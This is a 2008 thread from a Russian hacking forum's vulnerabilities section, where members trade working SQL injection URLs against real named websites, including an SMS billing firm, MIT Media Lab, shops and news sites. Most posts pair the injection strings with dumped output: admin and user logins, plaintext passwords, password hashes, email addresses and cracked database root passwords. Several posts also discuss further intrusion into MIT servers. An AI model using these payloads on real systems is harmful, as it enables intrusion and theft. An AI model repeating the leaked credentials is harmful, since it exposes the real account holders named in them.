ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5711  
Старый 14.06.2008, 15:13
s_p_a_m
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
Провел на форуме:
1608432

Репутация: 158
По умолчанию

www.pirok.ru/news.php?id=-1+union+select+1,2,name,4,password,6+from+admin/*

сверху логин, снизу пароль админа
Админка по адресу: www.pirok.ru/admin
 
Ответить с цитированием

  #5712  
Старый 14.06.2008, 15:28
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

различные смс-билинги:
Код:
http://www.3bill.com/casestudy.html?client_id=-1+UNION+SELECT+1,CONCAT(0x6472385F3838777777333371,concat(column_name),0x686874666638385F363632),3,4,5,6,7+FROM+information_schema.columns+where+table_name='clients'+limit+1,1/*
клиентская часть кстати на другой машине:
Код:
http://client.3bill.com/extranet/client_pages/cms/lib/exportXML.php?clientid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&service=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&sort=ASC&sheet=detailList.xsl
Код:
client_name
description
client_logo
case_study
picture
sortorder
COLLATIONS
cc_audit
ccdata
charge_model
client_rights
clientrate
clientv2_adodblog
configuration
credit_status
creditnote_lines
creditnotes
cron_manager
prod_3bill:ccdata
cc_audit
ccdata
charge_model
client_rights
clientrate
clientv2_adodblog
configuration
credit_status
creditnote_lines
creditnotes
cron_manager
cron_manager_log
defaultrate
defaultrate_copy
delivery_method
показун:
Код:
http://www.pokazun.ru/sms.php?showDescr=1&pl=1100+union+select+1+from+users_advPlaces/*
посимвольным брутом..
ещё 1 буржуйский с пр6:
Код:
http://mblox.com/news/press-announcements/press_release.php?press_id=11'+UNION+SELECT+1,concat(email_name,0x3b,email),3,4,5,6,7+FROM+careers+limit+1,1/*
Код:
mbloxwebdb:careers
mbloxwebdb:contact_us_countries
mbloxwebdb:doc_reg
mbloxwebdb:enquiry
mbloxwebdb:events
mbloxwebdb:industry_news
mbloxwebdb:press_release
mbloxwebdb:short_code
mbloxwebdb:careers
mbloxwebdb:contact_us_countries
mbloxwebdb:doc_reg
mbloxwebdb:enquiry
mbloxwebdb:events
mbloxwebdb:industry_news
mbloxwebdb:press_release
mbloxwebdb:short_code
career_id
department
title
location
description
email
email_name
publish
id
local
country
send_to
id
name
email
company
country
browser
ip
date_created
id
name
email
telephone
company
country
country_other
industry
enquiry
sentto
browser
ip
date_created
event_id
title
location
date
enddate
message
logo
minilogo
email
event_link
info_link
shortcode_id
shortcode
country
company
phone_number
так что грабить смсками растяжимое понятие)

на последок старичок:
Код:
http://www.digiseller.ru/outside/default.asp?searchstr=--
может кто то и раскрутит)
 
Ответить с цитированием

  #5713  
Старый 14.06.2008, 17:27
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

RussianSt.com - Русскоязычный Портал: Интернет-Каталог, Каталог Бизнесов, Аукцион, Почта, Доски Объявлений, Форум, Чат, Развлечения, Справочная..

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+AUSER/*
andylv:andy2a:andylv@ukr.net
eliz:Godisov:eliz@r66.ru

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+firm/*
madina:b98facb4a69f2a46b22a54890e2b60f1:madina@qui ntetmortgage.com
rusworld:e04e5ecd5ef138690e3ec40a486ea6a1:RussianW orld@hotmail.com
bexpress:42c391321d55118cf2ce5e33964edb33:RussianW orld@hotmail.com

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,name,password,email) +from+chat_users/*
admin:MfPlkg:work@russianst.com
ADMINISTRATOR:3JOIQm:www@russianst.com

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+meet_board/*
glas1976:Ls38T:qwe-80@bk.ru
znax:M7hli:znax@bk.ru
Forsems:C0apt:nvtraderu@gmail.com

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+sell_board/*
m8t4t0o0w3v8:guNo4:f2k7j0c6o0s5@gmail.com
1363716:cHS39:infobalt3@yandex.ru
werxerty:NQU2G:malcom2007@km.ru

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+service_board/*
vjgfp:GmOj3:mopaz_market@kaluga.ru
gribok:O1lB9:gribka-net@yandex.ru
computp:0GHNA:uslugicomp@yandex.ru

Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+work_board/*
virusds:fo3e1:financialfreedom@mail.ru
pav--eldm:4YW0y:paveldmitriev@bk.ru
piciolog:OOOQX:piciolog@tut.by

Последний раз редактировалось ~!DoK_tOR!~; 14.06.2008 в 17:30..
 
Ответить с цитированием

  #5714  
Старый 14.06.2008, 20:52
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279

Репутация: 25
Отправить сообщение для Toxic с помощью ICQ
По умолчанию

http://www.minskvodstroy.by/index.php?p=gallerypic&img_id=-86+union+select+1,2,3,concat_ws(char(124),email,pa ss),5,6,7,8,9+from+minbud_user+limit+2,1--&galid=6&area=1&ascdesc=desc

1 cdea86d0b320a9485cc1ab925603d4ab ytrewq admin@minskvodstroy.by

Там еще шел лежит ))

Последний раз редактировалось Toxic; 14.06.2008 в 20:55..
 
Ответить с цитированием

  #5715  
Старый 15.06.2008, 00:35
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

Код:
http://azart.net.ua/bookmakers/catalog/?SECT=-1'+union+select+concat('%3Cbr%3E',version(),'%3Cbr%3E',user(),'%3Cbr%3E',database())/*
 
Ответить с цитированием

  #5716  
Старый 15.06.2008, 03:18
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Comingsoon.net
Цитата:
http://www.comingsoon.net/films.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
вывод в <meta name="DESCRIPTION" content="4.1.22:comingso_nextra:comingso_nextra@cs n-node1-int">

Aen.ru
Цитата:
http://www.aen.ru/?page=article&category=politics&article_id=-1+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7/*
Bmoca.org
Цитата:
http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,username,3,4,passwo rd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25+from+users--
Eicta.org
Цитата:
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(version())),2,3,4,5,6,7,8 ,9,10,11,12--
Bti.cornell.edu - Еда
Цитата:
http://bti.cornell.edu/pgrp/pgrp.php?id=201'
Freedocumentaries.org
Цитата:
http://freedocumentaries.org/film.php?id=-1+union+select+1/*
подбор?

Umpcportal.com
Цитата:
http://www.umpcportal.com/products/product.php?id=1'
скуль?

Последний раз редактировалось sabe; 15.06.2008 в 12:44..
 
Ответить с цитированием

  #5717  
Старый 15.06.2008, 06:06
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
Провел на форуме:
255505

Репутация: 22
По умолчанию

небольшой магазин
http://www.landmetzgerei.at/

http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить
 
Ответить с цитированием

  #5718  
Старый 15.06.2008, 08:20
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Лови:
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,versio n(),user(),database())+using+latin1),4,5,6,7,8,9/*
Таблицы не подбирал, это уж сам давай.
_____________________________

Цель - media.mit.edu, пр8, начал копать

Цитата:
http://affect.media.mit.edu/projects.php?id=-1935+union+select+1,2,3,concat_ws(0x3A3a,user,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+mysql.user/*
таблицы не подобрал.
Хеши которые сбрутились:
Цитата:
Quote:root::1c3b7f0b58c961df :: DufwtDB!
antigroupware::3f6686f4521deef9 :: wonderful
rcaneel::0d90c1511e59b951 :: failsafe
остальные в очереди.

На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.

Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.

Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.

Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.

Последний раз редактировалось Imperou$; 15.06.2008 в 08:28..
 
Ответить с цитированием

  #5719  
Старый 15.06.2008, 09:10
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

если есть доступ к mysql.user.. как нащет file_priv?
сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности.
mit.edu/admin - раскрытие путей.. (кое каких)
ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд...
это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))

Последний раз редактировалось sabe; 15.06.2008 в 09:25..
 
Ответить с цитированием

  #5720  
Старый 15.06.2008, 09:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.rosana.de

Код:
http://www.rosana.de/main.asp?main=-1'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+mysql.user/*
http://www.alpinestars.se

Код:
http://www.alpinestars.se/MainVisaUnderBild.asp?nid=1+or+1=(SELECT+TOP+1+cast(user+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ